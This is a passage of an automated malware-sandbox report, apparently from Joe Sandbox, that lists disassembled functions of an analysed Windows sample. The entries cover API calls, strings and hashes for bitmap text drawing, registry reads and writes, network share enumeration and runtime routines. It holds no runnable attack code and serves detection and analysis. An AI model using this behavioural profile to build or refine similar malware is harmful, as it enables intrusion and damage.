                                                                                                                            • Instruction Fuzzy Hash: E6312B756403147AF724AB649C8AFEA7338DF09704F504195F744AB1D2DBB86E44C7AC
                                                                                                                            Function 0041E300 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0041E30E
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000047E,000002BC), ref: 0041E35A
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041E367
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E375
                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0041E381
                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041E38D
                                                                                                                              • Part of subcall function 0041E280: CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041E2A3
                                                                                                                              • Part of subcall function 0041E280: SelectObject.GDI32(00000000,00000000), ref: 0041E2AD
                                                                                                                              • Part of subcall function 0041E280: DrawTextA.USER32(00000000,004BCE20,000000FF,?,00000400), ref: 0041E2CE
                                                                                                                              • Part of subcall function 0041E280: DrawTextA.USER32(00000000,004BCE20,000000FF,?,00000010), ref: 0041E2DF
                                                                                                                              • Part of subcall function 0041E280: GetStockObject.GDI32(0000000D), ref: 0041E2E7
                                                                                                                              • Part of subcall function 0041E280: SelectObject.GDI32(00000000,00000000), ref: 0041E2EF
                                                                                                                              • Part of subcall function 0041E280: DeleteObject.GDI32(00000000), ref: 0041E2F6
                                                                                                                            • SelectObject.GDI32(00000000,75D53C29), ref: 0041E3A0
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041E3A7
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041E3BA
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041E3CB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$Select$CreateDeleteText$CompatibleDraw$BitmapColorFontModeReleaseStock
                                                                                                                            • String ID: u4ou
                                                                                                                            • API String ID: 1917954226-2630692901
                                                                                                                            • Opcode ID: f124cd0ff04e5fbfd8231640472e7df28b59e43af88ab7b38344bb04a31b8380
                                                                                                                            • Instruction ID: 7b1e2fc2d7beb835fd261bede12d122ca37f61ea03320d98644ec2963549b2db
                                                                                                                            • Opcode Fuzzy Hash: f124cd0ff04e5fbfd8231640472e7df28b59e43af88ab7b38344bb04a31b8380
                                                                                                                            • Instruction Fuzzy Hash: 94216075D00209ABDB009FEA9D886EFFBB8FF49311F10527AF905A3660DB7449858B94
                                                                                                                            Function 0041B6A9 Relevance: 15.2, APIs: 10, Instructions: 160COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2835676872-0
                                                                                                                            • Opcode ID: d08d3607a5a92fb423bab01760a1a07046f89f88a6f18c66bb50b19f3c9d9e8d
                                                                                                                            • Instruction ID: 38ae835f69b5caf0217579c2b68f6554e75d00015f7552b6d1dbb779c9d70d1f
                                                                                                                            • Opcode Fuzzy Hash: d08d3607a5a92fb423bab01760a1a07046f89f88a6f18c66bb50b19f3c9d9e8d
                                                                                                                            • Instruction Fuzzy Hash: 305150706043458BD720EF65C884BAFB7F8FF84744F00892EE59997250DB74D489CBAA
                                                                                                                            Function 00401900 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040192C
                                                                                                                            • _memset.LIBCMT ref: 00401970
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 004019CA
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,data,00000000,?,0043CA58,00000108), ref: 004019F1
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401A00
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseCreateQueryValue
                                                                                                                            • String ID: S-1-5-18\Software\%s$Software\%s$data
                                                                                                                            • API String ID: 37298109-1164834365
                                                                                                                            • Opcode ID: 15d7c4e8a82c070dd0de30c409e9482aaf07a3738ebc1c9cc09a0771cbd4b3a1
                                                                                                                            • Instruction ID: 4086e6915d2916525553412eae5256325c76b2fa15a3c6f4e048d67b62872145
                                                                                                                            • Opcode Fuzzy Hash: 15d7c4e8a82c070dd0de30c409e9482aaf07a3738ebc1c9cc09a0771cbd4b3a1
                                                                                                                            • Instruction Fuzzy Hash: C2219A75E503187BE724DB509C46FEA7374DB18B00F104199BB44771C1EAF46EC48B99
                                                                                                                            Function 0041E280 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041E2A3
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E2AD
                                                                                                                            • DrawTextA.USER32(00000000,004BCE20,000000FF,?,00000400), ref: 0041E2CE
                                                                                                                            • DrawTextA.USER32(00000000,004BCE20,000000FF,?,00000010), ref: 0041E2DF
                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041E2E7
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E2EF
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041E2F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$DrawSelectText$CreateDeleteFontStock
                                                                                                                            • String ID: Tahoma
                                                                                                                            • API String ID: 176621763-3580928618
                                                                                                                            • Opcode ID: 78fb551cc925bca32b6682d08aa59f00d074fd96ace1d11ac32abfdeda7ad996
                                                                                                                            • Instruction ID: 007f58ff4962ad56c78a0c5f32a044bb907f91f90d0d163fefc4750496c2c755
                                                                                                                            • Opcode Fuzzy Hash: 78fb551cc925bca32b6682d08aa59f00d074fd96ace1d11ac32abfdeda7ad996
                                                                                                                            • Instruction Fuzzy Hash: 9CF01D703C4300BBF6201BA09C8FF6B3A68EB0AF51F301119B312BC1E1C6E464455A2D
                                                                                                                            Function 00402030 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 449COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040210C
                                                                                                                            • _memset.LIBCMT ref: 00402126
                                                                                                                            • _free.LIBCMT ref: 0040237B
                                                                                                                            • _memset.LIBCMT ref: 00402448
                                                                                                                              • Part of subcall function 0041B9A0: _memmove.LIBCMT ref: 0041B9DF
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BAA8
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BAD1
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BB24
                                                                                                                              • Part of subcall function 0041F020: _memset.LIBCMT ref: 0041F047
                                                                                                                              • Part of subcall function 00402740: memmove.NTDLL(?,00000000,?,0040253A), ref: 00402773
                                                                                                                            • _memmove.LIBCMT ref: 00402573
                                                                                                                            • __time64.LIBCMT ref: 00402580
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_memmove$__time64_freememmove
                                                                                                                            • String ID: lIC
                                                                                                                            • API String ID: 2817571782-1893863216
                                                                                                                            • Opcode ID: 993253f6717974e241065ace056076fa121b3da6861122fb7410edf335742bff
                                                                                                                            • Instruction ID: 4aa5ae40cc9d391a8dbd0e541590addac9a07c332d60b5f638ed022fa75e1140
                                                                                                                            • Opcode Fuzzy Hash: 993253f6717974e241065ace056076fa121b3da6861122fb7410edf335742bff
                                                                                                                            • Instruction Fuzzy Hash: CBF1F1B15083809BC320EF65DC81A9BB7E4AFD8308F04493EF58967381E7799945CB9B
                                                                                                                            Function 00401840 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00401869
                                                                                                                              • Part of subcall function 00402DC0: __strftime_l.LIBCMT ref: 00402DD5
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 004018AE
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 004018CE
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 004018DB
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004018E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFlushValue__strftime_l_memset
                                                                                                                            • String ID: Software\%s$data
                                                                                                                            • API String ID: 664986230-2588080539
                                                                                                                            • Opcode ID: f980ef23dc47325bee958ccaee62782d7d09edc6bf46f5647c9f6a964b4da467
                                                                                                                            • Instruction ID: d62cbd1ca9b6743c82e337ef7ba3e84bf7ad82d39c7eccfb29dc7f2b897fbdcf
                                                                                                                            • Opcode Fuzzy Hash: f980ef23dc47325bee958ccaee62782d7d09edc6bf46f5647c9f6a964b4da467
                                                                                                                            • Instruction Fuzzy Hash: DE11E575B90318BBD724DB60DC46FD97378AB18B01F104099BA85B61D0DEF46AC48B58
                                                                                                                            Function 0041E8A0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34windowregistryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Icon$ClassCursorRegister
                                                                                                                            • String ID: 0$SCAN$m
                                                                                                                            • API String ID: 4202395251-3574835850
                                                                                                                            • Opcode ID: 627f741942ed8ffa665dcbac24e0f7554396b1014172c2ecc967683f971c8674
                                                                                                                            • Instruction ID: cd2708527f8c9ff307f3812adb0760e774757ce43e84b82f15cc096565d65217
                                                                                                                            • Opcode Fuzzy Hash: 627f741942ed8ffa665dcbac24e0f7554396b1014172c2ecc967683f971c8674
                                                                                                                            • Instruction Fuzzy Hash: 2201F6B0C10218ABEB00DFE4D819BDFBFB8EB08304F10415AE904B7290D7BA16148FD8
                                                                                                                            Function 0041E920 Relevance: 10.6, APIs: 7, Instructions: 101windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0041E960
                                                                                                                            • DefWindowProcW.USER32(?,00000111,?,?), ref: 0041E991
                                                                                                                            • BeginPaint.USER32(?,?), ref: 0041E9F5
                                                                                                                            • EndPaint.USER32(?,?), ref: 0041EA01
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0041EA1D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3181456275-0
                                                                                                                            • Opcode ID: cb681f4638388885bc1e2f9ed1f61d75574201e5c8038efff34d4deca7bd3fbd
                                                                                                                            • Instruction ID: 6c2d3888f3e435d877acf54aaf2b45d1e93d16ee1ac06b446370fa4d32732ff5
                                                                                                                            • Opcode Fuzzy Hash: cb681f4638388885bc1e2f9ed1f61d75574201e5c8038efff34d4deca7bd3fbd
                                                                                                                            • Instruction Fuzzy Hash: 9A31C2713141189BC714EF28EC46ABB77A8EF89311F40455FF942D62A0DB799910C7EA
                                                                                                                            Function 00427449 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00436FA8,00000008,00427551,00000000,00000000,?,?,00425712,0042402B,?,?,00423F47,?,?,00401021), ref: 0042745A
                                                                                                                            • __lock.LIBCMT ref: 0042748E
                                                                                                                              • Part of subcall function 0042A4BB: __mtinitlocknum.LIBCMT ref: 0042A4D1
                                                                                                                              • Part of subcall function 0042A4BB: __amsg_exit.LIBCMT ref: 0042A4DD
                                                                                                                              • Part of subcall function 0042A4BB: EnterCriticalSection.KERNEL32(00000000,00000000,?,00427493,0000000D), ref: 0042A4E5
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 0042749B
                                                                                                                            • __lock.LIBCMT ref: 004274AF
                                                                                                                            • ___addlocaleref.LIBCMT ref: 004274CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID: KERNEL32.DLL
                                                                                                                            • API String ID: 637971194-2576044830
                                                                                                                            • Opcode ID: 4ae31d47d51f25d18cb776528707a901bc0bbcf371e673cf6eeb981d2aaaecc8
                                                                                                                            • Instruction ID: 5fe0c82e3a55a1a6126772232bd8c9383c5a4faa0ed1100b0955d7a3ccf392a4
                                                                                                                            • Opcode Fuzzy Hash: 4ae31d47d51f25d18cb776528707a901bc0bbcf371e673cf6eeb981d2aaaecc8
                                                                                                                            • Instruction Fuzzy Hash: 1F018E71504B009FD720AF66E809749BBE0AF04324F60894FE895963A0CBB8A544CF19
                                                                                                                            Function 0042F1A1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0042F1C2
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F1D3
                                                                                                                            • __getptd.LIBCMT ref: 0042F1E1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                            • API String ID: 803148776-2671469338
                                                                                                                            • Opcode ID: 3a61ae855f10ef9ed704f8156c0f68b864c13d923e62308632c65ea9e75b47ab
                                                                                                                            • Instruction ID: 8f4253f58bd42e0126eedceda7a998e46fde0fe100d0f1c0a8004dd3f3484704
                                                                                                                            • Opcode Fuzzy Hash: 3a61ae855f10ef9ed704f8156c0f68b864c13d923e62308632c65ea9e75b47ab
                                                                                                                            • Instruction Fuzzy Hash: 97E0ED31704124AEC720A765E54AB7A32E4EB84318FD540F7E80CCB622D62CDDA4CA5B
                                                                                                                            Function 00413670 Relevance: 9.1, APIs: 6, Instructions: 99memoryshareCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00413692
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000), ref: 004136AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocEnumGlobalOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3336353811-0
                                                                                                                            • Opcode ID: e4cb7cb96a8455757e171d872c89320e66d9a468d844b60fb199f981a6319e03
                                                                                                                            • Instruction ID: 6d7f72055025c7b0be6fe11486413a1798db894e983857bc46ed2fd87d8a8497
                                                                                                                            • Opcode Fuzzy Hash: e4cb7cb96a8455757e171d872c89320e66d9a468d844b60fb199f981a6319e03
                                                                                                                            • Instruction Fuzzy Hash: 1731C7F2900204BBEB20DF94DC45BEBB76CEB55311F10426AE904A7380D6755F85CB98
                                                                                                                            Function 0042F44E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 0042F476
                                                                                                                              • Part of subcall function 0042F00B: __getptd.LIBCMT ref: 0042F019
                                                                                                                              • Part of subcall function 0042F00B: __getptd.LIBCMT ref: 0042F027
                                                                                                                            • __getptd.LIBCMT ref: 0042F480
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F48E
                                                                                                                            • __getptd.LIBCMT ref: 0042F49C
                                                                                                                            • __getptd.LIBCMT ref: 0042F4A7
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 0042F4CD
                                                                                                                              • Part of subcall function 0042F0B0: __CallSettingFrame@12.LIBCMT ref: 0042F0FC
                                                                                                                              • Part of subcall function 0042F574: __getptd.LIBCMT ref: 0042F583
                                                                                                                              • Part of subcall function 0042F574: __getptd.LIBCMT ref: 0042F591
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            • Opcode ID: 0bb55ad1a8f18e571e8055ba5d03a78f92d849bd343b4f02beab386b201532d6
                                                                                                                            • Instruction ID: f810efa6baf9205a3d820aa4f956ba34af89ae7dadda1aa048723bd6062be242
                                                                                                                            • Opcode Fuzzy Hash: 0bb55ad1a8f18e571e8055ba5d03a78f92d849bd343b4f02beab386b201532d6
                                                                                                                            • Instruction Fuzzy Hash: A811FCB1D00219EFDF00EFA5D545A9DB7B0FF04314F90806EF81497252E73899559F58
                                                                                                                            Function 00426BCC Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00426BD8
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __amsg_exit.LIBCMT ref: 00426BF8
                                                                                                                            • __lock.LIBCMT ref: 00426C08
                                                                                                                            • InterlockedDecrement.KERNEL32(?,00436F48,0000000C,00424569,?,?,0042BD49), ref: 00426C25
                                                                                                                            • _free.LIBCMT ref: 00426C38
                                                                                                                            • InterlockedIncrement.KERNEL32(00142BA0,00436F48,0000000C,00424569,?,?,0042BD49), ref: 00426C50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3470314060-0
                                                                                                                            • Opcode ID: 3dc50b16b58a45325b85e3d966c219c40405d63b61814acbca95716be637b3f2
                                                                                                                            • Instruction ID: 862ff0a28eea9f8bdbb22befa2932ee8c98ff4cdf9945b71c31d560e492b3693
                                                                                                                            • Opcode Fuzzy Hash: 3dc50b16b58a45325b85e3d966c219c40405d63b61814acbca95716be637b3f2
                                                                                                                            • Instruction Fuzzy Hash: 6901E571B01631A7CB20BF56B94675E7360EB08724F96101BE890A3390C73CAD61CBDE
                                                                                                                            Function 00402C20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402C3A
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E4C
                                                                                                                              • Part of subcall function 00423E37: __CxxThrowException@8.LIBCMT ref: 00423E61
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E72
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402C71
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
